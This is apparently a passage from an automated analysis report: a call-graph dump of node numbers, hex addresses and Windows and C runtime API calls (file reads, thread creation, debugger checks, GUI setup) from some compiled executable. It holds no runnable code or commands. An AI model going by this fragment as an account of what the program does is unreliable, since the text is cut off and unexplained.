89 API calls 106172->106193 106194 bfcd7d 341 API calls 106172->106194 106198 bf8a52 68 API calls 106172->106198 106199 bf9d3c 60 API calls Mailbox 106172->106199 106200 c4678d 60 API calls 106172->106200 106173 bfd443 106173->106152 106201 c6a751 89 API calls 106174->106201 106178->106172 106184->106172 106185->106172 106187->106172 106188->106172 106189->106173 106190->106172 106191->106172 106192->106172 106193->106172 106194->106172 106195->106165 106196->106171 106197->106172 106198->106172 106199->106172 106200->106172 106201->106171 106202->106164 106203 bf552a 106210 bf5ab8 106203->106210 106209 bf555a Mailbox 106211 c10db6 Mailbox 59 API calls 106210->106211 106212 bf5acb 106211->106212 106213 c10db6 Mailbox 59 API calls 106212->106213 106214 bf553c 106213->106214 106215 bf54d2 106214->106215 106229 bf58cf 106215->106229 106219 bf5514 106219->106209 106221 bf8061 MultiByteToWideChar 106219->106221 106220 bf54e3 106220->106219 106236 bf5bc0 106220->106236 106242 bf5a7a 106220->106242 106222 bf80ce 106221->106222 106223 bf8087 106221->106223 106224 bf7d8c 59 API calls 106222->106224 106225 c10db6 Mailbox 59 API calls 106223->106225 106228 bf80c0 106224->106228 106226 bf809c MultiByteToWideChar 106225->106226 106259 bf774d 106226->106259 106228->106209 106230 c2dc3c 106229->106230 106231 bf58e0 106229->106231 106251 c45ecd 59 API calls Mailbox 106230->106251 106231->106220 106233 c2dc46 106234 c10db6 Mailbox 59 API calls 106233->106234 106235 c2dc52 106234->106235 106237 bf5bce 106236->106237 106238 bf5c33 106236->106238 106239 bf5bf6 106237->106239 106241 bf5c06 ReadFile 106237->106241 106252 bf5c4e SetFilePointerEx 106238->106252 106239->106220 106241->106237 106241->106239 106243 bf5a8e 106242->106243 106244 c2dcee 106242->106244 106253 bf59b9 106243->106253 106258 c45ecd 59 API calls Mailbox 106244->106258 106247 bf5a9a 106247->106220 106248 c2dcf9 106249 c10db6 Mailbox 59 API calls 106248->106249 106250 c2dd0e _memmove 106249->106250 106251->106233 106252->106237 106254 bf59d1 106253->106254 106257 bf59ca _memmove 106253->106257 106255 c10db6 Mailbox 59 API calls 106254->106255 106256 c2dc7e 106254->106256 106255->106257 106257->106247 106258->106248 106260 bf77cf 106259->106260 106261 bf775c 106259->106261 106262 bf7d2c 59 API calls 106260->106262 106261->106260 106263 bf7768 106261->106263 106270 bf777a _memmove 106262->106270 106264 bf7772 106263->106264 106265 bf77a0 106263->106265 106271 bf7f27 59 API calls Mailbox 106264->106271 106267 bf8029 59 API calls 106265->106267 106268 bf77aa 106267->106268 106269 c10db6 Mailbox 59 API calls 106268->106269 106269->106270 106270->106228 106271->106270 106272 bfe4a8 106273 bfd100 341 API calls 106272->106273 106274 bfe4b6 106273->106274 106275 c17c56 106276 c17c62 __freefls@4 106275->106276 106312 c19e08 GetStartupInfoW 106276->106312 106278 c17c67 106314 c18b7c GetProcessHeap 106278->106314 106280 c17cbf 106281 c17cca 106280->106281 106397 c17da6 58 API calls 3 library calls 106280->106397 106315 c19ae6 106281->106315 106284 c17cd0 106285 c17cdb __RTC_Initialize 106284->106285 106398 c17da6 58 API calls 3 library calls 106284->106398 106336 c1d5d2 106285->106336 106288 c17cea 106289 c17cf6 GetCommandLineW 106288->106289 106399 c17da6 58 API calls 3 library calls 106288->106399 106355 c24f23 GetEnvironmentStringsW 106289->106355 106292 c17cf5 106292->106289 106295 c17d10 106296 c17d1b 106295->106296 106400 c130b5 58 API calls 3 library calls 106295->106400 106365 c24d58 106296->106365 106299 c17d21 106300 c17d2c 106299->106300 106401 c130b5 58 API calls 3 library calls 106299->106401 106379 c130ef 106300->106379 106303 c17d34 106304 c17d3f __wwincmdln 106303->106304 106402 c130b5 58 API calls 3 library calls 106303->106402 106385 bf47d0 106304->106385 106307 c17d62 106404 c130e0 58 API calls _doexit 106307->106404 106308 c17d53 106308->106307 106403 c13358 58 API calls _doexit 106308->106403 106311 c17d67 __freefls@4 106313 c19e1e 106312->106313 106313->106278 106314->106280 106405 c13187 36 API calls 2 library calls 106315->106405 106317 c19aeb 106406 c19d3c InitializeCriticalSectionAndSpinCount __ioinit 106317->106406 106319 c19af0 106320 c19af4 106319->106320 106408 c19d8a TlsAlloc 106319->106408 106407 c19b5c 61 API calls 2 library calls 106320->106407 106323 c19af9 106323->106284 106324 c19b06 106324->106320 106325 c19b11 106324->106325 106409 c187d5 106325->106409 106328 c19b53 106417 c19b5c 61 API calls 2 library calls 106328->106417 106331 c19b58 106331->106284 106332 c19b32 106332->106328 106333 c19b38 106332->106333 106416 c19a33 58 API calls 4 library calls 106333->106416 106335 c19b40 GetCurrentThreadId 106335->106284 106337 c1d5de __freefls@4 106336->106337 106338 c19c0b __lock 58 API calls 106337->106338 106339 c1d5e5 106338->106339 106340 c187d5 __calloc_crt 58 API calls 106339->106340 106342 c1d5f6 106340->106342 106341 c1d661 GetStartupInfoW 106344 c1d7a5 106341->106344 106351 c1d676 106341->106351 106342->106341 106343 c1d601 @_EH4_CallFilterFunc@8 __freefls@4 106342->106343 106343->106288 106345 c1d86d 106344->106345 106349 c1d7f2 GetStdHandle 106344->106349 106350 c1d805 GetFileType 106344->106350 106430 c19e2b InitializeCriticalSectionAndSpinCount 106344->106430 106431 c1d87d LeaveCriticalSection _doexit 106345->106431 106346 c1d6c4 106346->106344 106352 c1d6f8 GetFileType 106346->106352 106429 c19e2b InitializeCriticalSectionAndSpinCount 106346->106429 106348 c187d5 __calloc_crt 58 API calls 106348->106351 106349->106344 106350->106344 106351->106344 106351->106346 106351->106348 106352->106346 106356 c24f34 106355->106356 106357 c17d06 106355->106357 106432 c1881d 58 API calls 2 library calls 106356->106432 106361 c24b1b GetModuleFileNameW 106357->106361 106359 c24f5a _memmove 106360 c24f70 FreeEnvironmentStringsW 106359->106360 106360->106357 106362 c24b4f _wparse_cmdline 106361->106362 106364 c24b8f _wparse_cmdline 106362->106364 106433 c1881d 58 API calls 2 library calls 106362->106433 106364->106295 106366 c24d71 __NMSG_WRITE 106365->106366 106367 c24d69 106365->106367 106368 c187d5 __calloc_crt 58 API calls 106366->106368 106367->106299 106369 c24d9a __NMSG_WRITE 106368->106369 106369->106367 106371 c24df1 106369->106371 106372 c187d5 __calloc_crt 58 API calls 106369->106372 106373 c24e16 106369->106373 106376 c24e2d 106369->106376 106434 c24607 58 API calls 2 library calls 106369->106434 106370 c12d55 _free 58 API calls 106370->106367 106371->106370 106372->106369 106374 c12d55 _free 58 API calls 106373->106374 106374->106367 106435 c18dc6 IsProcessorFeaturePresent 106376->106435 106378 c24e39 106378->106299 106380 c130fb __IsNonwritableInCurrentImage 106379->106380 106450 c1a4d1 106380->106450 106382 c13119 __initterm_e 106383 c12d40 __cinit 67 API calls 106382->106383 106384 c13138 _doexit __IsNonwritableInCurrentImage 106382->106384 106383->106384 106384->106303 106386 bf47ea 106385->106386 106396 bf4889 106385->106396 106387 bf4824 IsThemeActive 106386->106387 106453 c1336c 106387->106453 106391 bf4850 106465 bf48fd SystemParametersInfoW SystemParametersInfoW 106391->106465 106393 bf485c 106466 bf3b3a 106393->106466 106395 bf4864 SystemParametersInfoW 106395->106396 106396->106308 106397->106281 106398->106285 106399->106292 106403->106307 106404->106311 106405->106317 106406->106319 106407->106323 106408->106324 106410 c187dc 106409->106410 106412 c18817 106410->106412 106414 c187fa 106410->106414 106418 c251f6 106410->106418 106412->106328 106415 c19de6 TlsSetValue 106412->106415 106414->106410 106414->106412 106426 c1a132 Sleep 106414->106426 106415->106332 106416->106335 106417->106331 106419 c25201 106418->106419 106423 c2521c 106418->106423 106420 c2520d 106419->106420 106419->106423 106427 c18b28 58 API calls __getptd_noexit 106420->106427 106422 c2522c RtlAllocateHeap 106422->106423 106424 c25212 106422->106424 106423->106422 106423->106424 106428 c133a1 DecodePointer 106423->106428 106424->106410 106426->106414 106427->106424 106428->106423 106429->106346 106430->106344 106431->106343 106432->106359 106433->106364 106434->106369 106436 c18dd1 106435->106436 106441 c18c59 106436->106441 106440 c18dec 106440->106378 106442 c18c73 _memset ___raise_securityfailure 106441->106442 106443 c18c93 IsDebuggerPresent 106442->106443 106449 c1a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 106443->106449 106445 c18d57 ___raise_securityfailure 106446 c1c5f6 __ld12tod 6 API calls 106445->106446 106447 c18d7a 106446->106447 106448 c1a140 GetCurrentProcess TerminateProcess 106447->106448 106448->106440 106449->106445 106451 c1a4d4 EncodePointer 106450->106451 106451->106451 106452 c1a4ee 106451->106452 106452->106382 106454 c19c0b __lock 58 API calls 106453->106454 106455 c13377 DecodePointer EncodePointer 106454->106455 106518 c19d75 LeaveCriticalSection 106455->106518 106457 bf4849 106458 c133d4 106457->106458 106459 c133f8 106458->106459 106460 c133de 106458->106460 106459->106391 106460->106459 106519 c18b28 58 API calls __getptd_noexit 106460->106519 106462 c133e8 106520 c18db6 9 API calls strtoxl 106462->106520 106464 c133f3 106464->106391 106465->106393 106467 bf3b47 __write_nolock 106466->106467 106468 bf7667 59 API calls 106467->106468 106469 bf3b51 GetCurrentDirectoryW 106468->106469 106521 bf3766 106469->106521 106471 bf3b7a IsDebuggerPresent 106472 c2d272 MessageBoxA 106471->106472 106473 bf3b88 106471->106473 106476 c2d28c 106472->106476 106474 bf3c61 106473->106474 106473->106476 106477 bf3ba5 106473->106477 106475 bf3c68 SetCurrentDirectoryW 106474->106475 106480 bf3c75 Mailbox 106475->106480 106643 bf7213 59 API calls Mailbox 106476->106643 106602 bf7285 106477->106602 106480->106395 106481 c2d29c 106486 c2d2b2 SetCurrentDirectoryW 106481->106486 106486->106480 106518->106457 106519->106462 106520->106464 106522 bf7667 59 API calls 106521->106522 106523 bf377c 106522->106523 106645 bf3d31 106523->106645 106525 bf379a 106526 bf4706 61 API calls 106525->106526 106527 bf37ae 106526->106527 106528 bf7de1 59 API calls 106527->106528 106529 bf37bb 106528->106529 106530 bf4ddd 136 API calls 106529->106530 106531 bf37d4 106530->106531 106532 c2d173 106531->106532 106533 bf37dc Mailbox 106531->106533 106687 c5955b 106532->106687 106537 bf8047 59 API calls 106533->106537 106536 c2d192 106539 c12d55 _free 58 API calls 106536->106539 106540 bf37ef 106537->106540 106538 bf4e4a 84 API calls 106538->106536 106541 c2d19f 106539->106541 106659 bf928a 106540->106659 106543 bf4e4a 84 API calls 106541->106543 106545 c2d1a8 106543->106545 106549 bf3ed0 59 API calls 106545->106549 106546 bf7de1 59 API calls 106547 bf3808 106546->106547 106548 bf84c0 69 API calls 106547->106548 106550 bf381a Mailbox 106548->106550 106551 c2d1c3 106549->106551 106552 bf7de1 59 API calls 106550->106552 106553 bf3ed0 59 API calls 106551->106553 106554 bf3840 106552->106554 106555 c2d1df 106553->106555 106556 bf84c0 69 API calls 106554->106556 106557 bf4706 61 API calls 106555->106557 106559 bf384f Mailbox 106556->106559 106558 c2d204 106557->106558 106560 bf3ed0 59 API calls 106558->106560 106562 bf7667 59 API calls 106559->106562 106561 c2d210 106560->106561 106563 bf8047 59 API calls 106561->106563 106564 bf386d 106562->106564 106565 c2d21e 106563->106565 106662 bf3ed0 106564->106662 106567 bf3ed0 59 API calls 106565->106567 106569 c2d22d 106567->106569 106575 bf8047 59 API calls 106569->106575 106571 bf3887 106571->106545 106572 bf3891 106571->106572 106573 c12efd _W_store_winword 60 API calls 106572->106573 106574 bf389c 106573->106574 106574->106551 106576 bf38a6 106574->106576 106577 c2d24f 106575->106577 106578 c12efd _W_store_winword 60 API calls 106576->106578 106579 bf3ed0 59 API calls 106577->106579 106580 bf38b1 106578->106580 106581 c2d25c 106579->106581 106580->106555 106582 bf38bb 106580->106582 106581->106581 106583 c12efd _W_store_winword 60 API calls 106582->106583 106584 bf38c6 106583->106584 106584->106569 106585 bf3907 106584->106585 106587 bf3ed0 59 API calls 106584->106587 106585->106569 106586 bf3914 106585->106586 106588 bf92ce 59 API calls 106586->106588 106589 bf38ea 106587->106589 106590 bf3924 106588->106590 106591 bf8047 59 API calls 106589->106591 106592 bf9050 59 API calls 106590->106592 106593 bf38f8 106591->106593 106594 bf3932 106592->106594 106595 bf3ed0 59 API calls 106593->106595 106678 bf8ee0 106594->106678 106595->106585 106597 bf928a 59 API calls 106599 bf394f 106597->106599 106598 bf8ee0 60 API calls 106598->106599 106599->106597 106599->106598 106600 bf3ed0 59 API calls 106599->106600 106601 bf3995 Mailbox 106599->106601 106600->106599 106601->106471 106603 bf7292 __write_nolock 106602->106603 106604 bf72ab 106603->106604 106605 c2ea22 _memset 106603->106605 106606 bf4750 60 API calls 106604->106606 106607 c2ea3e GetOpenFileNameW 106605->106607 106608 bf72b4 106606->106608 106609 c2ea8d 106607->106609 106729 c10791 106608->106729 106611 bf7bcc 59 API calls 106609->106611 106613 c2eaa2 106611->106613 106613->106613 106643->106481 106646 bf3d3e __write_nolock 106645->106646 106647 bf7bcc 59 API calls 106646->106647 106651 bf3ea4 Mailbox 106646->106651 106649 bf3d70 106647->106649 106648 bf79f2 59 API calls 106648->106649 106649->106648 106658 bf3da6 Mailbox 106649->106658 106650 bf3e77 106650->106651 106652 bf7de1 59 API calls 106650->106652 106651->106525 106654 bf3e98 106652->106654 106653 bf7de1 59 API calls 106653->106658 106656 bf3f74 59 API calls 106654->106656 106655 bf79f2 59 API calls 106655->106658 106656->106651 106657 bf3f74 59 API calls 106657->106658 106658->106650 106658->106651 106658->106653 106658->106655 106658->106657 106660 c10db6 Mailbox 59 API calls 106659->106660 106661 bf37fb 106660->106661 106661->106546 106663 bf3eda 106662->106663 106664 bf3ef3 106662->106664 106666 bf8047 59 API calls 106663->106666 106665 bf7bcc 59 API calls 106664->106665 106667 bf3879 106665->106667 106666->106667 106668 c12efd 106667->106668 106669 c12f09 106668->106669 106670 c12f7e 106668->106670 106677 c12f2e 106669->106677 106722 c18b28 58 API calls __getptd_noexit 106669->106722 106724 c12f90 60 API calls 4 library calls 106670->106724 106673 c12f8b 106673->106571 106674 c12f15 106723 c18db6 9 API calls strtoxl 106674->106723 106676 c12f20 106676->106571 106677->106571 106679 c2f17c 106678->106679 106684 bf8ef7 106678->106684 106679->106684 106726 bf8bdb 59 API calls Mailbox 106679->106726 106681 bf8fff 106681->106599 106682 bf8ff8 106685 c10db6 Mailbox 59 API calls 106682->106685 106683 bf9040 106725 bf9d3c 60 API calls Mailbox 106683->106725 106684->106681 106684->106682 106684->106683 106685->106681 106688 bf4ee5 85 API calls 106687->106688 106689 c595ca 106688->106689 106727 c59734 96 API calls 2 library calls 106689->106727 106691 c595dc 106692 c2d186 106691->106692 106693 bf4f0b 74 API calls 106691->106693 106692->106536 106692->106538 106694 c595f7 106693->106694 106695 bf4f0b 74 API calls 106694->106695 106696 c59607 106695->106696 106697 bf4f0b 74 API calls 106696->106697 106698 c59622 106697->106698 106699 bf4f0b 74 API calls 106698->106699 106700 c5963d 106699->106700 106701 bf4ee5 85 API calls 106700->106701 106702 c59654 106701->106702 106703 c1571c _W_store_winword 58 API calls 106702->106703 106704 c5965b 106703->106704 106705 c1571c _W_store_winword 58 API calls 106704->106705 106706 c59665 106705->106706 106707 bf4f0b 74 API calls 106706->106707 106708 c59679 106707->106708 106728 c59109 GetSystemTimeAsFileTime 106708->106728 106710 c5968c 106711 c596b6 106710->106711 106712 c596a1 106710->106712 106714 c596bc 106711->106714 106715 c5971b 106711->106715 106713 c12d55 _free 58 API calls 106712->106713 106716 c596a7 106713->106716 106717 c58b06 116 API calls 106714->106717 106718 c12d55 _free 58 API calls 106715->106718 106719 c12d55 _free 58 API calls 106716->106719 106720 c59713 106717->106720 106718->106692 106719->106692 106721 c12d55 _free 58 API calls 106720->106721 106721->106692 106722->106674 106723->106676 106724->106673 106725->106681 106726->106684 106727->106691 106728->106710 106730 c1079e __write_nolock 106729->106730 106731 c1079f GetLongPathNameW 106730->106731 106732 bf7bcc 59 API calls 106731->106732 106733 bf72bd 106732->106733 106734 bf700b 106733->106734 106735 bf7667 59 API calls 106734->106735 106736 bf701d 106735->106736 106737 bf4750 60 API calls 106736->106737 106738 bf7028 106737->106738 106739 c2e885 106738->106739 106740 bf7033 106738->106740 106745 c2e89f 106739->106745 106787 bf7908 61 API calls 106739->106787 106742 bf3f74 59 API calls 106740->106742 106743 bf703f 106742->106743 106781 bf34c2 106743->106781 106746 bf7052 Mailbox 106782 bf34d4 106781->106782 106786 bf34f3 _memmove 106781->106786 106785 c10db6 Mailbox 59 API calls 106782->106785 106783 c10db6 Mailbox 59 API calls 106784 bf350a 106783->106784 106784->106746 106785->106786 106786->106783 106787->106739 107027 bf1066 107032 bff76f 107027->107032 107029 bf106c 107030 c12d40 __cinit 67 API calls 107029->107030 107031 bf1076 107030->107031 107033 bff790 107032->107033 107065 c0ff03 107033->107065 107037 bff7d7 107038 bf7667 59 API calls 107037->107038 107039 bff7e1 107038->107039 107040 bf7667 59 API calls 107039->107040 107041 bff7eb 107040->107041 107042 bf7667 59 API calls 107041->107042 107043 bff7f5 107042->107043 107044 bf7667 59 API calls 107043->107044 107045 bff833 107044->107045 107046 bf7667 59 API calls 107045->107046 107047 bff8fe 107046->107047 107075 c05f87 107047->107075 107051 bff930 107052 bf7667 59 API calls 107051->107052 107053 bff93a 107052->107053 107103 c0fd9e 107053->107103 107055 bff981 107056 bff991 GetStdHandle 107055->107056 107057 bff9dd 107056->107057 107058 c345ab 107056->107058 107059 bff9e5 OleInitialize 107057->107059 107058->107057 107060 c345b4 107058->107060 107059->107029 107110 c56b38 64 API calls Mailbox 107060->107110 107062 c345bb 107111 c57207 CreateThread 107062->107111 107064 c345c7 CloseHandle 107064->107059 107112 c0ffdc 107065->107112 107068 c0ffdc 59 API calls 107069 c0ff45 107068->107069 107070 bf7667 59 API calls 107069->107070 107071 c0ff51 107070->107071 107072 bf7bcc 59 API calls 107071->107072 107073 bff796 107072->107073 107074 c10162 6 API calls 107073->107074 107074->107037 107076 bf7667 59 API calls 107075->107076 107077 c05f97 107076->107077 107078 bf7667 59 API calls 107077->107078 107079 c05f9f 107078->107079 107119 c05a9d 107079->107119 107082 c05a9d 59 API calls 107083 c05faf 107082->107083 107084 bf7667 59 API calls 107083->107084 107085 c05fba 107084->107085 107086 c10db6 Mailbox 59 API calls 107085->107086 107087 bff908 107086->107087 107088 c060f9 107087->107088 107089 c06107 107088->107089 107090 bf7667 59 API calls 107089->107090 107091 c06112 107090->107091 107092 bf7667 59 API calls 107091->107092 107093 c0611d 107092->107093 107094 bf7667 59 API calls 107093->107094 107095 c06128 107094->107095 107096 bf7667 59 API calls 107095->107096 107097 c06133 107096->107097 107098 c05a9d 59 API calls 107097->107098 107099 c0613e 107098->107099 107100 c10db6 Mailbox 59 API calls 107099->107100 107101 c06145 RegisterWindowMessageW 107100->107101 107101->107051 107104 c4576f 107103->107104 107105 c0fdae 107103->107105 107122 c59ae7 60 API calls 107104->107122 107107 c10db6 Mailbox 59 API calls 107105->107107 107109 c0fdb6 107107->107109 107108 c4577a 107109->107055 107110->107062 107111->107064 107123 c571ed 65 API calls 107111->107123 107113 bf7667 59 API calls 107112->107113 107114 c0ffe7 107113->107114 107115 bf7667 59 API calls 107114->107115 107116 c0ffef 107115->107116 107117 bf7667 59 API calls 107116->107117 107118 c0ff3b 107117->107118 107118->107068 107120 bf7667 59 API calls 107119->107120 107121 c05aa5 107120->107121 107121->107082 107122->107108 107124 c2fdfc 107128 bfab30 Mailbox _memmove 107124->107128 107126 c4617e Mailbox 59 API calls 107148 bfa057 107126->107148 107147 bf7de1 59 API calls 107128->107147 107128->107148 107152 bf9f37 Mailbox 107128->107152 107154 c6bc6b 341 API calls 107128->107154 107156 bfb2b6 107128->107156 107157 bf9ea0 341 API calls 107128->107157 107159 bfb525 107128->107159 107160 c3086a 107128->107160 107162 c30878 107128->107162 107164 c3085c 107128->107164 107165 bfb21c 107128->107165 107167 c10db6 59 API calls Mailbox 107128->107167 107170 c46e8f 59 API calls 107128->107170 107176 c01fc3 107128->107176 107216 c6445a 107128->107216 107225 c6df23 107128->107225 107228 c5d07b 107128->107228 107275 c722da 107128->107275 107304 c6c2e0 107128->107304 107336 c57956 107128->107336 107342 c4617e 107128->107342 107347 bf9c90 59 API calls Mailbox 107128->107347 107351 c6c193 85 API calls 2 library calls 107128->107351 107131 c10db6 59 API calls Mailbox 107131->107152 107132 c30055 107352 c59e4a 89 API calls 4 library calls 107132->107352 107135 bfb475 107139 bf8047 59 API calls 107135->107139 107137 bf8047 59 API calls 107137->107152 107138 c30064 107139->107148 107143 bf7667 59 API calls 107143->107152 107144 bfb47a 107144->107132 107151 c309e5 107144->107151 107145 c46e8f 59 API calls 107145->107152 107146 c12d40 67 API calls __cinit 107146->107152 107147->107128 107149 c309d6 107357 c59e4a 89 API calls 4 library calls 107149->107357 107358 c59e4a 89 API calls 4 library calls 107151->107358 107152->107131 107152->107132 107152->107135 107152->107137 107152->107143 107152->107144 107152->107145 107152->107146 107152->107148 107152->107149 107153 bfa55a 107152->107153 107345 bfc8c0 341 API calls 2 library calls 107152->107345 107346 bfb900 60 API calls Mailbox 107152->107346 107356 c59e4a 89 API calls 4 library calls 107153->107356 107154->107128 107350 bff6a3 341 API calls 107156->107350 107157->107128 107353 c59e4a 89 API calls 4 library calls 107159->107353 107354 bf9c90 59 API calls Mailbox 107160->107354 107355 c59e4a 89 API calls 4 library calls 107162->107355 107164->107126 107164->107148 107348 bf9d3c 60 API calls Mailbox 107165->107348 107167->107128 107168 bfb22d 107349 bf9d3c 60 API calls Mailbox 107168->107349 107170->107128 107359 bf9a98 107176->107359 107180 c10db6 Mailbox 59 API calls 107181 c01ff4 107180->107181 107182 c02004 107181->107182 107387 bf57a6 60 API calls Mailbox 107181->107387 107186 bf9837 84 API calls 107182->107186 107183 c36585 107184 c02029 107183->107184 107391 c5f574 59 API calls 107183->107391 107188 bf9b3c 59 API calls 107184->107188 107191 c02036 107184->107191 107187 c02012 107186->107187 107190 bf57f6 67 API calls 107187->107190 107189 c365cd 107188->107189 107189->107191 107192 c365d5 107189->107192 107193 c02021 107190->107193 107195 bf5cdf 2 API calls 107191->107195 107194 bf9b3c 59 API calls 107192->107194 107193->107183 107193->107184 107390 bf58ba CloseHandle 107193->107390 107197 c0203d 107194->107197 107195->107197 107198 c365e7 107197->107198 107199 c02057 107197->107199 107201 c10db6 Mailbox 59 API calls 107198->107201 107200 bf7667 59 API calls 107199->107200 107202 c0205f 107200->107202 107203 c365ed 107201->107203 107372 bf5572 107202->107372 107205 c36601 107203->107205 107392 bf5850 ReadFile SetFilePointerEx 107203->107392 107210 c36605 _memmove 107205->107210 107393 c576c4 59 API calls 2 library calls 107205->107393 107206 c0206e 107206->107210 107388 bf9a3c 59 API calls Mailbox 107206->107388 107211 c02082 Mailbox 107212 c020bc 107211->107212 107213 bf5c6f CloseHandle 107211->107213 107212->107128 107214 c020b0 107213->107214 107214->107212 107389 bf58ba CloseHandle 107214->107389 107217 bf9837 84 API calls 107216->107217 107218 c64494 107217->107218 107219 bf6240 94 API calls 107218->107219 107221 c644a4 107219->107221 107220 c644c9 107223 bf9a98 59 API calls 107220->107223 107224 c644cd 107220->107224 107221->107220 107222 bf9ea0 341 API calls 107221->107222 107222->107220 107223->107224 107224->107128 107226 c6cadd 130 API calls 107225->107226 107227 c6df33 107226->107227 107227->107128 107229 c5d0a5 107228->107229 107230 c5d09a 107228->107230 107234 bf7667 59 API calls 107229->107234 107273 c5d17f Mailbox 107229->107273 107231 bf9b3c 59 API calls 107230->107231 107231->107229 107232 c10db6 Mailbox 59 API calls 107233 c5d1c8 107232->107233 107235 c5d1d4 107233->107235 107398 bf57a6 60 API calls Mailbox 107233->107398 107236 c5d0c9 107234->107236 107239 bf9837 84 API calls 107235->107239 107238 bf7667 59 API calls 107236->107238 107240 c5d0d2 107238->107240 107241 c5d1ec 107239->107241 107242 bf9837 84 API calls 107240->107242 107243 bf57f6 67 API calls 107241->107243 107244 c5d0de 107242->107244 107245 c5d1fb 107243->107245 107246 bf459b 59 API calls 107244->107246 107247 c5d233 107245->107247 107248 c5d1ff GetLastError 107245->107248 107249 c5d0f3 107246->107249 107253 c5d295 107247->107253 107254 c5d25e 107247->107254 107250 c5d218 107248->107250 107251 bf7b2e 59 API calls 107249->107251 107264 c5d188 Mailbox 107250->107264 107399 bf58ba CloseHandle 107250->107399 107252 c5d126 107251->107252 107255 c5d178 107252->107255 107260 c53c37 3 API calls 107252->107260 107256 c10db6 Mailbox 59 API calls 107253->107256 107257 c10db6 Mailbox 59 API calls 107254->107257 107258 bf9b3c 59 API calls 107255->107258 107261 c5d29a 107256->107261 107262 c5d263 107257->107262 107258->107273 107263 c5d136 107260->107263 107261->107264 107267 bf7667 59 API calls 107261->107267 107265 c5d274 107262->107265 107268 bf7667 59 API calls 107262->107268 107263->107255 107266 c5d13a 107263->107266 107264->107128 107400 c6fbce 59 API calls 2 library calls 107265->107400 107270 bf7de1 59 API calls 107266->107270 107267->107264 107268->107265 107271 c5d147 107270->107271 107397 c53a2a 63 API calls Mailbox 107271->107397 107273->107232 107273->107264 107274 c5d150 Mailbox 107274->107255 107276 bf9837 84 API calls 107275->107276 107277 c722f4 107276->107277 107278 bf7a16 59 API calls 107277->107278 107279 c72303 107278->107279 107280 c72331 107279->107280 107281 bf9b3c 59 API calls 107279->107281 107282 c05a9d 59 API calls 107280->107282 107284 c72314 107281->107284 107283 c7233a 107282->107283 107285 bf7de1 59 API calls 107283->107285 107284->107280 107286 c72319 107284->107286 107287 c72348 107285->107287 107288 bf8047 59 API calls 107286->107288 107401 c05b12 107287->107401 107291 c72323 Mailbox 107288->107291 107290 c72357 Mailbox 107410 c05bc4 107290->107410 107423 bf9a3c 59 API calls Mailbox 107291->107423 107294 c7240b Mailbox 107294->107128 107296 bf7667 59 API calls 107299 c72389 107296->107299 107297 c723c0 107301 bf7b2e 59 API calls 107297->107301 107302 c723da Mailbox 107297->107302 107299->107297 107300 bf3f74 59 API calls 107299->107300 107413 c461bb 107299->107413 107300->107299 107301->107297 107419 c05ace 107302->107419 107305 bf7667 59 API calls 107304->107305 107306 c6c2f4 107305->107306 107307 bf7667 59 API calls 107306->107307 107308 c6c2fc 107307->107308 107309 bf7667 59 API calls 107308->107309 107310 c6c304 107309->107310 107311 bf9837 84 API calls 107310->107311 107335 c6c312 107311->107335 107312 bf7bcc 59 API calls 107312->107335 107313 bf7924 59 API calls 107313->107335 107314 c6c4fb 107315 c6c528 Mailbox 107314->107315 107427 bf9a3c 59 API calls Mailbox 107314->107427 107315->107128 107317 c6c4e2 107318 bf7cab 59 API calls 107317->107318 107321 c6c4ef 107318->107321 107319 c6c4fd 107322 bf7cab 59 API calls 107319->107322 107320 bf8047 59 API calls 107320->107335 107324 bf7b2e 59 API calls 107321->107324 107325 c6c50c 107322->107325 107323 bf7e4f 59 API calls 107326 c6c3a9 CharUpperBuffW 107323->107326 107324->107314 107327 bf7b2e 59 API calls 107325->107327 107426 bf843a 68 API calls 107326->107426 107327->107314 107328 bf7e4f 59 API calls 107330 c6c469 CharUpperBuffW 107328->107330 107331 bfc5a7 69 API calls 107330->107331 107331->107335 107332 bf9837 84 API calls 107332->107335 107333 bf7cab 59 API calls 107333->107335 107334 bf7b2e 59 API calls 107334->107335 107335->107312 107335->107313 107335->107314 107335->107315 107335->107317 107335->107319 107335->107320 107335->107323 107335->107328 107335->107332 107335->107333 107335->107334 107337 c57962 107336->107337 107338 c10db6 Mailbox 59 API calls 107337->107338 107339 c57970 107338->107339 107340 bf7667 59 API calls 107339->107340 107341 c5797e 107339->107341 107340->107341 107341->107128 107428 c460c0 107342->107428 107344 c4618c 107344->107128 107345->107152 107346->107152 107347->107128 107348->107168 107349->107156 107350->107159 107351->107128 107352->107138 107353->107164 107354->107164 107355->107164 107356->107148 107357->107151 107358->107148 107360 c2f7d6 107359->107360 107361 bf9aa8 107359->107361 107362 c2f7e7 107360->107362 107363 bf7bcc 59 API calls 107360->107363 107366 c10db6 Mailbox 59 API calls 107361->107366 107364 bf7d8c 59 API calls 107362->107364 107363->107362 107365 c2f7f1 107364->107365 107369 bf9ad4 107365->107369 107370 bf7667 59 API calls 107365->107370 107367 bf9abb 107366->107367 107367->107365 107368 bf9ac6 107367->107368 107368->107369 107371 bf7de1 59 API calls 107368->107371 107369->107180 107369->107183 107370->107369 107371->107369 107373 bf557d 107372->107373 107374 bf55a2 107372->107374 107373->107374 107378 bf558c 107373->107378 107375 bf7d8c 59 API calls 107374->107375 107379 c5325e 107375->107379 107376 c5328d 107376->107206 107380 bf5ab8 59 API calls 107378->107380 107379->107376 107394 c531fa ReadFile SetFilePointerEx 107379->107394 107395 bf7924 59 API calls 2 library calls 107379->107395 107381 c5337e 107380->107381 107383 bf54d2 61 API calls 107381->107383 107384 c5338c 107383->107384 107386 c5339c Mailbox 107384->107386 107396 bf77da 61 API calls Mailbox 107384->107396 107386->107206 107387->107182 107388->107211 107389->107212 107390->107183 107391->107183 107392->107205 107393->107210 107394->107379 107395->107379 107396->107386 107397->107274 107398->107235 107399->107264 107400->107264 107402 c05ace 59 API calls 107401->107402 107403 c05b20 107402->107403 107409 c05b2f 107403->107409 107424 c066e1 61 API calls 2 library calls 107403->107424 107405 c10db6 Mailbox 59 API calls 107406 c05b59 107405->107406 107406->107290 107407 c05b7c 107407->107406 107425 c05c32 59 API calls Mailbox 107407->107425 107409->107405 107411 bf8047 59 API calls 107410->107411 107412 c05bd2 107411->107412 107412->107296 107414 c461d4 107413->107414 107415 c461c6 107413->107415 107417 bf774d 59 API calls 107414->107417 107416 bf7d2c 59 API calls 107415->107416 107418 c461d2 107416->107418 107417->107418 107418->107299 107420 c05ad8 107419->107420 107421 bf7d8c 59 API calls 107420->107421 107422 c05af3 107421->107422 107422->107291 107423->107294 107424->107407 107425->107409 107426->107335 107427->107315 107429 c460e8 107428->107429 